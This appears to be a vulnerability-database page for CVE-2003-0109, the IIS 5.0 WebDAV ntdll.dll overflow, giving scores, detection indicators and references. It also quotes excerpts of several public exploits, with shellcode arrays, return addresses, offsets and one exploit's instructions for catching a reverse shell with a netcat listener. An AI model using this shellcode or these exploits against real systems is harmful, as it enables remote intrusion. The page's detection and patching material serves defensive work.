CVE-2003-0109
published 2003-03-31CVE-2003-0109: Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to…
PriorityP274high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
86.40%
99.7th percentile
Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc\xcc\xcc\xf3\xab
bytes↗
\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c\x90\x90\x90\x90\x03\xf1\x56\x5f
bytes↗
\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7
- →Detect oversized SEARCH method WebDAV requests to IIS on port 80; the exploit sends a SEARCH request with a URL of ~65514–65535 characters to trigger the ntdll.dll overflow. ↗
- →Detect HTTP SEARCH requests with Content-Type: text/xml and a body containing the WebDAV SQL-like query 'Select "DAV:displayname" from scope()' paired with an abnormally long URI. ↗
- →Check response body for 'Server Error(exception' string as an indicator of a vulnerable IIS 5.0 host, as used by the Metasploit check() function. ↗
- →Vulnerability scanners may probe ports 139 and 445 for this IIS WebDAV bug; remap detections on those ports back to port 80 for accurate correlation. ↗
- →The W32.Welchia worm actively exploited this vulnerability; monitor for mass scanning activity against port 80 with oversized SEARCH WebDAV requests as a worm propagation indicator. ↗
- →Bad characters for payload encoding are known; payloads will avoid null bytes and URL-special characters: 0x00, 0x3a, 0x26, 0x3f, 0x25, 0x23, 0x20, 0x0a, 0x0d, 0x2f, 0x2b, 0x0b, 0x5c. ↗
- ·Windows NT 4.0 does not support WebDAV, so WebDAV-based exploit attempts will not be effective against NT 4.0 systems, though the underlying ntdll.dll vulnerability is still present. ↗
- ·Windows XP does not include WebDAV by default, but WebDAV may be installed by a user on Windows XP with IIS 5.1, making it a possible exploitation vector in those cases. ↗
- ·The Metasploit module only works against Windows 2000 (SP0–SP3) and uses brute-force return address targeting; it does not reliably exploit other Windows versions via this method. ↗
- ·The Microsoft patch Q815021 corrects both the RtlDosPathNameToNtPathName_U and RtlGetFullPathName_U vulnerable functions; both must be patched to fully remediate the vulnerability. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-949q-m2rc-xq42: Buffer overflow in ntdll
ghsa_unreviewed·2022-04-29
CVE-2003-0109 [HIGH] GHSA-949q-m2rc-xq42: Buffer overflow in ntdll
Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0.
VulnCheck
Microsoft Windows Out-of-bounds Write
vulncheck·2003·CVSS 7.5
CVE-2003-0109 [HIGH] Microsoft Windows Out-of-bounds Write
Microsoft Windows Out-of-bounds Write
Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments
No detection rules found.
Exploit-DB
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)
exploitdb·2010-07-25
CVE-2003-0109 Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)
---
##
# $Id: ms03_007_ntdll_webdav.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
'Description' => %q{
This exploits a buffer overflow in NTDLL.dll on Windows 2000
through the SEARCH WebDAV method in IIS. This particular
module only works against Windows 2000. It should have a
reasonable chance of success against any service pack.
},
'Author' => [ 'hdm' ],
'License' => MSF_LIC
Exploit-DB
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)
exploitdb·2003-07-08
CVE-2003-0109 Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)
---
/*
* IIS 5.0 WebDAV Exploit Xnuxer Lab
* By Schizoprenic, Copyright (c) 2003
* WebDAV exploit without netcat or telnet and with pretty magic number as RET
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RET 0xc9c9
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
"\x24\x63\xbd\xd9\x99\xf3\
Exploit-DB
Microsoft Windows - WebDAV Remote Code Execution (2)
exploitdb·2003-06-01
CVE-2003-0109 Microsoft Windows - WebDAV Remote Code Execution (2)
Microsoft Windows - WebDAV Remote Code Execution (2)
---
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* 29/05/2003 - by Alumni - */
/* Microsoft IIS WebDAV New Exploit */
/* spawns shell on port 32768 */
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
#include
#include
#include
#define SHELLCODELEN 753
#define NOP 0x90
#define BUFFERLEN 1024
#define RET 0x41424344
#define GMHOFF 30
#define GPAOFF 38
#define IPOFF 161
#define DEFPORT 32768
//#define DEBUGGEE_FLOW // for debug only
#ifdef DEBUGGEE_FLOW
#define GMH (long)GetModuleHandle
#define GPA (long)GetProcAddress
#else
#define GMH 0x0100107C // GetModuleHandle@
#define GPA 0x01001034 // GetProcAddress@
#endif
#define XOROFF 11
#define SOFF 16
char prologue[] =
"\xEB\x03" // jmp $+3
"\x58" // pop eax
"\x50" // push eax
"\xC3" // retn
"
Exploit-DB
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3)
exploitdb·2003-04-04
CVE-2003-0109 Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3)
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3)
---
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to pat
Exploit-DB
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2)
exploitdb·2003-03-31
CVE-2003-0109 Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2)
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
** Microsoft has re
Exploit-DB
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1)
exploitdb·2003-03-24
CVE-2003-0109 Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1)
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1)
---
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to pat
Exploit-DB
Microsoft IIS 5.0 - WebDAV Remote
exploitdb·2003-03-24
CVE-2003-0109 Microsoft IIS 5.0 - WebDAV Remote
Microsoft IIS 5.0 - WebDAV Remote
---
/*************************************/
/* IIS 5.0 WebDAV -Proof of concept- */
/* [ Bug: CAN-2003-0109 ] */
/* By Roman Medina-Heigl Hernandez */
/* aka RoMaNSoFt */
/* Madrid, 23.Mar.2003 */
/* ================================= */
/* Public release. Version 1. */
/* --------------------------------- */
/*************************************/
/* ====================================================================
* --[ READ ME ]
*
* This exploit is mainly a proof of concept of the recently discovered ntdll.dll bug (which may be
* exploited in many other programs, not necessarily IIS). Practical exploitation is not as easy as
* expected due to difficult RET guessing mixed with possible IIS crashes (which makes RET brute
* forcing a tedious work). The
Exploit-DB
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow
exploitdb·2003-03-23
CVE-2003-0109 Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow
---
/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1
Exploit-DB
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4)
exploitdb·2003-03-17
CVE-2003-0109 Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4)
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4)
---
source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
** Microsoft has revis
Metasploit
MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
metasploit
MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against SP0 to SP3.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=104826476427372&w=2http://marc.info/?l=bugtraq&m=104861839130254&w=2http://marc.info/?l=bugtraq&m=104869293619064&w=2http://marc.info/?l=bugtraq&m=104887148323552&w=2http://marc.info/?l=bugtraq&m=105768156625699&w=2http://marc.info/?l=ntbugtraq&m=104826785731151&w=2http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=enhttp://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ815021http://www.cert.org/advisories/CA-2003-09.htmlhttp://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=22029http://www.iss.net/security_center/static/11533.phphttp://www.kb.cert.org/vuls/id/117394http://www.nextgenss.com/papers/ms03-007-ntdll.pdfhttp://www.securityfocus.com/bid/7116https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-007https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A109http://marc.info/?l=bugtraq&m=104826476427372&w=2http://marc.info/?l=bugtraq&m=104861839130254&w=2http://marc.info/?l=bugtraq&m=104869293619064&w=2http://marc.info/?l=bugtraq&m=104887148323552&w=2http://marc.info/?l=bugtraq&m=105768156625699&w=2http://marc.info/?l=ntbugtraq&m=104826785731151&w=2http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=enhttp://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ815021http://www.cert.org/advisories/CA-2003-09.htmlhttp://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=22029http://www.iss.net/security_center/static/11533.phphttp://www.kb.cert.org/vuls/id/117394http://www.nextgenss.com/papers/ms03-007-ntdll.pdfhttp://www.securityfocus.com/bid/7116https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-007https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A109
2003-03-31
Published
Exploited in the wild